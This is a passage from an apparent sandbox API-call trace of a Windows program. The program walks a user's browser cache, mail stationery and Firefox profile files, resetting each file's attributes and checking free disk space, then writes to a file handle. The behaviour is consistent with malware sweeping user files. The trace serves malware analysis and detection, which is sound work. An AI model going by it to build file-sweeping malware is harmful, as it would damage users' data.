(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRKA[1].jpg", dwFileAttributes=0x80) returned 1 [0144.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.874] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfRwv[1].jpg", dwFileAttributes=0x80) returned 1 [0144.877] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.884] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfwtU[1].jpg", dwFileAttributes=0x80) returned 1 [0144.887] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.893] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfY4X[1].jpg", dwFileAttributes=0x80) returned 1 [0144.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.904] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg", dwFileAttributes=0x80) returned 1 [0144.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.912] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg", dwFileAttributes=0x80) returned 1 [0144.915] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.921] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg", dwFileAttributes=0x80) returned 1 [0144.924] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.929] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg", dwFileAttributes=0x80) returned 1 [0144.932] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.937] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png", dwFileAttributes=0x80) returned 1 [0144.941] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.946] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png", dwFileAttributes=0x80) returned 1 [0144.949] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.955] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png", dwFileAttributes=0x80) returned 1 [0144.957] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.963] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png", dwFileAttributes=0x80) returned 1 [0144.967] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.972] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png", dwFileAttributes=0x80) returned 1 [0144.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.989] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg", dwFileAttributes=0x80) returned 1 [0144.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0145.000] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png", dwFileAttributes=0x80) returned 1 [0145.004] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0145.010] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png", dwFileAttributes=0x80) returned 1 [0145.012] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0145.034] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt", dwFileAttributes=0x80) returned 1 [0145.038] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0145.046] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg", dwFileAttributes=0x80) returned 1 [0145.049] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0145.055] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm", dwFileAttributes=0x80) returned 1 [0145.057] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0145.063] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm", dwFileAttributes=0x80) returned 1 [0145.076] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0145.081] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml", dwFileAttributes=0x80) returned 1 [0145.084] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0145.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0145.095] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat", dwFileAttributes=0x80) returned 1 [0145.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.105] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm", dwFileAttributes=0x80) returned 1 [0145.108] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.122] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", dwFileAttributes=0x80) returned 1 [0145.124] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm", dwFileAttributes=0x80) returned 1 [0145.132] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.139] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", dwFileAttributes=0x80) returned 1 [0145.142] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.148] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm", dwFileAttributes=0x80) returned 1 [0145.152] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.161] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", dwFileAttributes=0x80) returned 1 [0145.164] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.168] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm", dwFileAttributes=0x80) returned 1 [0145.171] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.177] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", dwFileAttributes=0x80) returned 1 [0145.181] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.185] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm", dwFileAttributes=0x80) returned 1 [0145.189] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.194] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", dwFileAttributes=0x80) returned 1 [0145.197] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.201] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm", dwFileAttributes=0x80) returned 1 [0145.212] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.219] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", dwFileAttributes=0x80) returned 1 [0145.221] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.226] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm", dwFileAttributes=0x80) returned 1 [0145.230] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.235] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", dwFileAttributes=0x80) returned 1 [0145.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.243] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm", dwFileAttributes=0x80) returned 1 [0145.245] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.251] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", dwFileAttributes=0x80) returned 1 [0145.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.258] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm", dwFileAttributes=0x80) returned 1 [0145.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.267] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", dwFileAttributes=0x80) returned 1 [0145.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.275] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm", dwFileAttributes=0x80) returned 1 [0145.277] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.283] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", dwFileAttributes=0x80) returned 1 [0145.286] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.292] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD", dwFileAttributes=0x80) returned 1 [0145.295] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.302] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML", dwFileAttributes=0x80) returned 1 [0145.333] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0145.368] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite", dwFileAttributes=0x80) returned 1 [0145.381] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0145.388] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", dwFileAttributes=0x80) returned 1 [0145.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0145.398] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", dwFileAttributes=0x80) returned 1 [0145.401] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0145.412] SetFilePointer (in: hFile=0x280, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2aef54*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef54*=0) returned 0x1b800 [0145.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0145.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0145.414] WriteFile (in: hFile=0x280, lpBuffer=0x210e704*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x2aef54, lpOverlapped=0x0 | out: lpBuffer=0x210e704*, lpNumberOfBytesWritten=0x2aef54*=0xb70, lpOverlapped=0x0) returned 1 [0145.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeedc) returned 1 [0145.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed8) returned 1 [0145.417] WriteFile (in: hFile=0x280, lpBuffer=0x21119dc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef84, lpOverlapped=0x0 | out: lpBuffer=0x21119dc*, lpNumberOfBytesWritten=0x2aef84*=0x20c, lpOverlapped=0x0) returned 1 [0145.418] 